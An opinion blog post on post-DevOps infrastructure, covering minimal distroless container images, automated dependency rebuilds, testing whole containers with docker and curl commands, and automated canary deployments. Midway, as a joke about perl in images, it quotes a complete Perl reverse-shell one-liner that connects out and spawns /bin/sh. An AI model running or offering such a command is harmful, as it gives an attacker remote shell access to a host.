Infrastructure in this post-DevOps world?

“Those who cannot remember the past are condemned to repeat it” - Jorge Santayana

Those who remember the past repeat it too, though they may not be condemned to. Containers are merely the same bad bash scripts that used to run the Internet in the ’90s and 2000s (who remembers cutting and pasting bash commands out of Word docs?), complete with the same running things as root, and trying to work out exactly which library you need to manually include to make the chroot() work.

Given that even the tiniest static blog now requires Kubernetes by default, what does this look like for how we build and deploy [predominantly] web infrastructure? And seeing as we’re trying to be in vogue, what does that mean for our exciting world of post-DevOps?

Everyone wants a platform for good™

Everyone wants 2010 Heroku, or at least the thing they want turns out to have already been built by Heroku (including Salesforce, I imagine). What do I mean by this? A platform as a service. Due to the ever increasing complexity of the ball of string we refer to as modern infrastructure, many are moving back to more specialised areas. Developers want to write code and run it. Infrastructure people, whatever they’re called this week (the “SRE” to “sysadmin” sliding scale of pay), want to write yaml, no, run Kubernetes so they can get a new job, no, build and run reliable infrastructure. DBREs/DBAs just want a break.

Developers don’t want to be maintaining Dockerfiles and staying on top of Linux CVEs (who does?). Infrastructureians want to stop having every single system they maintain be different and unique; they want to look after cattle, not pets.

Security people? I don’t know what you’ll want any more. It’s probably the same thing as 10 years ago, just rebranded with basic but outdated container support. It would be good if they wanted something that lined up with the rest of engineering, and they can by embracing change, not by pushing against it.

Security often makes businesses slower. The incredible Kelly Shortridge has written extensively about Security Obstructionism and how the way security teams function, whether by choice or not, is to slow down or block innovation and development. I personally don’t feel this is as intentional as it seems; it is often a symptom of vastly differing incentives and expectations rather than a base desire of every security team. But the outcome is still the same: slowed down development at best, and security cut out of the loop at worst.

Container images should be wee!

In the beginning (okay, much later) Docker was created. This has made a lot of people very angry and been widely regarded as a bad move.

Over the years people have migrated from using giant images such as the oracle/database 13.2GB, to container specific versions of mainstream OSes such as Ubuntu Core, then down to the smol and much loved Alpine.

The hotness du jour is Distroless (congratulations, you’ve reinvented using chroot from 1997), where the goal is to have no userland you don’t need in the image. For compiled applications like Go, Rust and the like this is easy, as they do/can spit out static binaries so you don’t have to worry about libraries (as a whole). They can contain as little as ca-certificates, /etc/passwd, /tmp, and tzdata!

% docker inspect | jq '.[0].Size' | numfmt --to iec --format "%.2f"

Yeah the entire container would fit on two floppy disks.

For something like Python it’s harder, and rubby, well, that project got abandoned.

Why is this important? It’s not like anyone is running low on hard drive space? Well, ignoring strange articles from Red Hat, smaller images build quicker, deploy quicker, and get vuln scanned quicker. You want these feedback cycles to be as quick as possible, so if anything goes wrong you don’t have to wait and context switch. When you’re spinning up 100s or even 1000s of a container in production, the time taken for a 5mb image vs a 50mb image vs a 500mb image becomes something you can notice. In cases of roll-backs (if you believe in them), seconds count.
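To put rough numbers on that, here is a back-of-the-envelope sketch. Everything in it is an assumption for illustration: the function name `pull_seconds`, the 1000 hosts, the 1000 Mbit/s each host gets from the registry, and the 50 hosts pulling at once. It ignores layer caching, decompression and registry throttling, so treat the output as a feel for the scale rather than a measurement.

```shell
# Rough estimate of how long it takes to get an image onto many hosts.
# usage: pull_seconds IMAGE_MB HOSTS MBIT_PER_SEC PARALLEL
pull_seconds() {
    awk -v mb="$1" -v hosts="$2" -v bw="$3" -v par="$4" 'BEGIN {
        per_host = (mb * 8) / bw                 # seconds for one host to pull
        waves = int((hosts + par - 1) / par)     # hosts pull in batches of "par"
        printf "%.1f\n", per_host * waves
    }'
}

# Assumed fleet: 1000 hosts, 1000 Mbit/s per pull, 50 pulls at a time.
for size in 5 50 500; do
    echo "${size}mb image: $(pull_seconds "$size" 1000 1000 50)s"
done
```

Under those made-up numbers the 5mb image is everywhere in under a second and the 500mb one takes over a minute, which is a long time to stare at a roll-back.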

And yeah, there’s some security differences between the 2mb and the 120mb versions of the two base containers, as you’d expect.

% docker scan


Package manager:   deb
Project name:      docker-image|
Docker image:
Platform:          linux/amd64

✔ Tested 3 dependencies for known vulnerabilities, no vulnerable paths found.

% docker scan debian:11

Testing debian:11...

Package manager:   deb
Project name:      docker-image|debian
Docker image:      debian:11
Platform:          linux/amd64
Base image:        debian:11.2

Tested 97 dependencies for known vulnerabilities, found 43 vulnerabilities.

According to our scan, you are currently using the most secure version of the selected base image

Things that are in this example list of vulnerabilities: systemd/libsystemd0 which we shouldn’t be running in a container, krb5/libk5crypto3 for all the Kerberos everyone does in their containers, high severity vulnerabilities in perl/perl-base which again, why do we need an entire scripting language in a container?

perl -e 'use Socket; $i=""; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'

isn’t going to run itself?

Fewer packages to be outdated (mmm compliance), fewer packages that have security vulnerabilities that someone needs to worry about, which also leads to updating it less, so even if you believe in none of the rest of this then fewer updates is fewer changes.

Automatic Rebuilding

I’ve built or maintained many systems that tell developers they need to upgrade one thing or another, and one common element in all of them is that absolutely no one wants to.

✨✨Developers, by and large, should not have to care about CVEs!✨✨

A platform first world is one where developers don’t really have to know what base OS their container is on. They ship their very standard code to the repo. Library and code scanning can be in the IDE (Snyk; VS Code is the way it seems, no vim support? 😢) or once it hits the repo, with something like GitHub Code Scanning or Dependabot, which if you’ve used JitHub you’ve probably already seen. The advantage of CI/Repo side scanning vs. later in any pipeline is that the closer to the actual code (as in editor, or PR) you can get the “you need to upgrade this library” message, the more likely it is to happen and the more easily its implications are understood. Given an email a week from now saying “you need to upgrade this library” versus a notification before you even push the code (from the IDE, git push hook, Dependabot PR, etc), I know which one most developers would prefer. Okay, maybe not prefer, but are more likely to action. In a more perfect world, there’s a system that, when there’s a CVE, upgrades the library in your Gemfile/Pipfile/Cargo.toml etc, then rebuilds, re-tests and all that other good stuff we’ve talked about. If that all works, then the PR is automatically raised. The dream.

A lot of this does get harder the more “jazz” your engineering is. For example, trying to get rubby to compile with libv8 is next to impossible, let alone getting it to happen with an automated set of tests. Whereas a Rust or Golang static binary that can be added to a 2mb container is a lot easier and safer. Your mileage will vary.

But again again again, this needs to be an engineering wide move, and it won’t ever be overnight. Shifting how you structure and build your applications, and where they interface with each layer (application, libraries, OS, containers, which of the 2-3 clouds your k8s runs on) is as big a shift for many as when Agile was cool, or people tried to pronounce Kanban properly.

Testing your code vs. testing your service

Remember about a decade ago, as infrastructure was moving from running on a single server, to running on multiple, load balanced servers with N+at-least-one? People slowly started to realise that the business didn’t care if a server was up, or if httpd was running on a host, the business cared if the service/website/whatever it was still worked? And slowly people migrated their Nagios configs to not instantly page the moment a single host out of a web cluster had the slightest problem.

As our development and our deployment models have shifted, a lot of our testing hasn’t. Most CI that I’ve experienced happily goes off and runs all your spec tests, then some integration tests, then slaps that on a container and ships it off to your container registry to be deployed.

You’ve tested the code, and some of the application, but you haven’t tested the service/the container, the actual thing you’re running as a whole. Despite my diligent subscription to Gareth Rushgrove’s Devops weekly I haven’t found an amazing answer for this.

Why is this important if the tests work? Well, it depends how, where and when you do your testing. For example, many languages' dependency management tools allow you to specify “install these for testing” and “install these for production”. Bundler, everyone’s favourite rubby tool, has Deployment Mode and it’s commonplace to not install all of your testing frameworks in your final image. So you have the thing you test, and then the thing you ship, and they are not the same. This gets harder still for compiled languages. Rust’s Cargo.toml can have build-dependencies and dev-dependencies (example from dog) and Golang does something similar, it just works on Plan9 by default.

The advantage of having something that tests the “service” is that it allows automation safely. When I worked at a questionable startup in the mid 2000s, we did a deployment every month or so. Once our collection of ever evolving bash scripts had thrown some jars on to some web services and restarted Tomcat, we’d go and browse the fresh new web site to see if it worked before opening it up to the world. This was a monolithic Java app running a website. If you are doing this in 2022 you need to look for a new job. If you are deploying once every few months, you probably don’t need to worry about “Post DevOps” 😄.

Deploy agility: “But we deploy 4 days a week!”

So you can only deploy 57% of the time? Nowhere else in the software engineering world is that a good metric. Anyway.

As my Marmite like friend, the ever expressive Charity Majors, writes in Deploys: It’s not actually about Friday:

It’s not about Fridays. It’s about having a healthy ecosystem and feedback loop where you trust your deploys, where deploys aren’t a big deal

Which of these two statements fills you with more confidence?

  1. “the code tests passed, so the code must be good”
  2. “the new deploy container runs the same as the current one”

I know which one I’d pick to deploy. Even on a Friday.

“Just add more tests” alone will not save you

Just as DevOps wasn’t “just use Chef and git”, this isn’t “just add some new tests”; this is a shift in how you design, build and deploy applications. You have to be able to have isolated testable microservices, ideally with a common API/interface between them (unless you want to spend all your time writing custom tests). You need to expose the parts of your application that you need confidence in to something that can test them from the outside. The “click around the website” model of the Java app I spoke of earlier is not reproducible (I swear if anyone mentions Selenium as a “solution”, I will turn this car around).

If all your applications expose a common REST/HTTP endpoint that can have tests run against it in the codepaths you need confidence in, you can now run the entire container/service through CI and have that confidence expressed to you.
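As a minimal sketch of what “tests run against it from the outside” could look like, assuming the built container is already running and listening somewhere CI can reach it: the function name `smoke_test`, the base URL, the paths and the expected status codes below are all hypothetical, so swap in whichever codepaths you actually need confidence in. The only real tool involved is curl, using its `-s`, `-o` and `-w '%{http_code}'` options.

```shell
# Poke a running container over HTTP and compare status codes.
# usage: smoke_test BASE_URL PATH=STATUS [PATH=STATUS ...]
smoke_test() {
    base=$1; shift
    failures=0
    for check in "$@"; do
        path=${check%%=*}      # everything before the first "="
        want=${check##*=}      # everything after the last "="
        # -s: silent, -o /dev/null: discard the body, -w: print only the status code
        got=$(curl -s -o /dev/null -w '%{http_code}' "$base$path")
        if [ "$got" = "$want" ]; then
            echo "ok   $path ($got)"
        else
            echo "FAIL $path (wanted $want, got $got)"
            failures=$((failures + 1))
        fi
    done
    # exit status is non-zero if any check failed, so CI can gate on it
    [ "$failures" -eq 0 ]
}

# Hypothetical usage against a container published on localhost:8080:
#   smoke_test http://localhost:8080 /healthz=200 /login=200 /admin=401
```

Because every service speaks the same interface, the same few lines work for all of them, which is rather the point.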

Deeper testing of infrastructure components

Here’s an example of a contrived infrastructure component being tested. I find infrastructure components have even fewer options for testing than their programming language counterparts. (If you suggest Server Spec or InSpec then we are not friends.)

The stages commonly seen:

  1. It built!
  2. It built and the thing we want kinda works?
% docker run --rm newhaproxyimg haproxy -v \
    ; echo $?
HAProxy version 2.5.1-86b093a 2022/01/11 -
Status: stable branch - will stop receiving fixes around Q1 2023.
Known bugs:
Running on: Linux 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
  3. It built and it says a config is okay.
% cat haproxy.config | docker run --rm newhaproxyimg haproxy -f /dev/stdin -c -v
HAProxy version 2.5.1-86b093a 2022/01/11 -
Status: stable branch - will stop receiving fixes around Q1 2023.
Known bugs:
Running on: Linux 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
  4. Finally, we spin up a web server, put haproxy in front of it, and attempt to GET a file through it.

docker create -v /local --name local alpine:latest /bin/true
docker create -v /web --name web alpine:latest /bin/true
docker cp test/test.cfg local:/local
docker cp test/ok.html web:/web

# Run haproxy
docker run --detach --volumes-from local --name haproxy --rm newhaproxyimg haproxy -f /local/test.cfg -dW -V

# Run a busybox web server
docker run --detach --network container:haproxy --name httpd --volumes-from web --rm alpine:latest \
    sh -c 'apk add busybox-extras && /usr/sbin/httpd -v -f -p 8000 -h /web'

docker run --network container:haproxy --rm curlimages/curl curl -v -4 --show-error ''

You can see as the testing progresses, we can gain more and more confidence that the container we intend to ship will do what we expect. This increase of confidence empowers us to deploy this image automatically, without constant human review.
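One way to wire those stages into something CI can gate on is sketched below. The `run_stages` name is made up for illustration; it just runs each command in order and stops at the first one that fails, so the later, more expensive stages only run once the cheap ones have passed.

```shell
# Run test stages in order of increasing confidence; stop at the first failure.
# usage: run_stages 'command one' 'command two' ...
run_stages() {
    n=0
    for stage in "$@"; do
        n=$((n + 1))
        # each stage is an ordinary shell command; only its exit status matters here
        if sh -c "$stage" >/dev/null 2>&1; then
            echo "stage $n passed: $stage"
        else
            echo "stage $n FAILED: $stage"
            return 1
        fi
    done
    echo "all $n stages passed"
}

# Hypothetical usage (the build command and the test script path are assumptions):
#   run_stages \
#       'docker build -t newhaproxyimg .' \
#       'docker run --rm newhaproxyimg haproxy -v' \
#       './test/end-to-end.sh'
```

Throwing the stage output away keeps the sketch short; in real CI you would want to keep it for whoever has to work out why stage 3 fell over.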

Why do the canaries keep dying in our coal mine?

Canary analysis was initially a manual process for engineers at Netflix… Needless to say, this approach didn’t scale and was not reliable.

Now you have your container widget, you finally get to deploy it, yay, but in honour of everything old being new again, we’re going to talk about blue/green deployments, sorry I mean “automated canary analysis”.

The difference again here is automation. Rather than the “press the swap over to the green cluster” button, we have our CI flow building trust that what we have isn’t going to instantly break the moment you deploy it. Then the automated canaries get deployed in a small subset, which is then monitored and compared to baseline instances of the same application. This, again, requires your applications/systems to be providing accessible metrics and APIs for this introspection. This has to be a move that is done as a group, if you want it to succeed. It’s so much harder to have one team acting solely on their own (regardless of whether they’re a dev, ops, SRE, security, janitor, whatever team); you still need to move together as a group to build these systems together. This isn’t a return to “throwing code over the wall”, it’s moving on to building systems together by being experts in your domain.
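The “compared to baseline” step can be sketched as a single check, assuming your metrics system can hand you request and error counts for both groups. This is a deliberately naive one-metric threshold with a made-up name (`canary_ok`) and a made-up tolerance; real canary analysis tooling compares many metrics statistically, and this is not a description of how Netflix does it.

```shell
# Pass if the canary error rate is no worse than MAX_RATIO times the baseline rate.
# usage: canary_ok BASE_ERRORS BASE_REQUESTS CANARY_ERRORS CANARY_REQUESTS MAX_RATIO
# exit status: 0 = promote, 1 = canary is worse, 2 = not enough traffic to judge
canary_ok() {
    awk -v be="$1" -v br="$2" -v ce="$3" -v cr="$4" -v max="$5" 'BEGIN {
        if (br == 0 || cr == 0) exit 2       # no requests, no verdict
        base = be / br
        canary = ce / cr
        exit ((canary <= base * max) ? 0 : 1)
    }'
}

# Hypothetical usage: allow the canary up to 1.5x the baseline error rate.
#   canary_ok 12 10000 3 500 1.5 && echo promote || echo rollback
```

Note that a baseline with zero errors makes this check demand zero errors from the canary too, which is one of several reasons the grown-up tools use more than a ratio.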

An artist’s approximation of a conclusion

As we move in to whatever this era is called this time, what got us here won’t get us there, if that’s where we decide to go. In a move shocking no one, complexity is being added, not taken away, and our Glorious Kubernetes Future is YAML rich and feels inescapable, even if no one is able to tell you what value it actually provides. How we operate looks set to compartmentalise, rather than isolate, teams, as owning “the whole stack” becomes more and more impossible, at least until the tooling evolves. Teams will still need to work with each other. I’m hopefully obviously not saying we’re heading back to the dark pre DevOps days, merely that responsibilities will get more delimitation and even more standardisation, you know, like Heroku did in 2009! 😸

Further reading

I’m reluctant to say “use this tool” but here’s some tools, and a lot more not tools that continue these ideas, or I just plain stole them from in the first place.

Also a shameless plug for more controversial takes on how the future could all be better: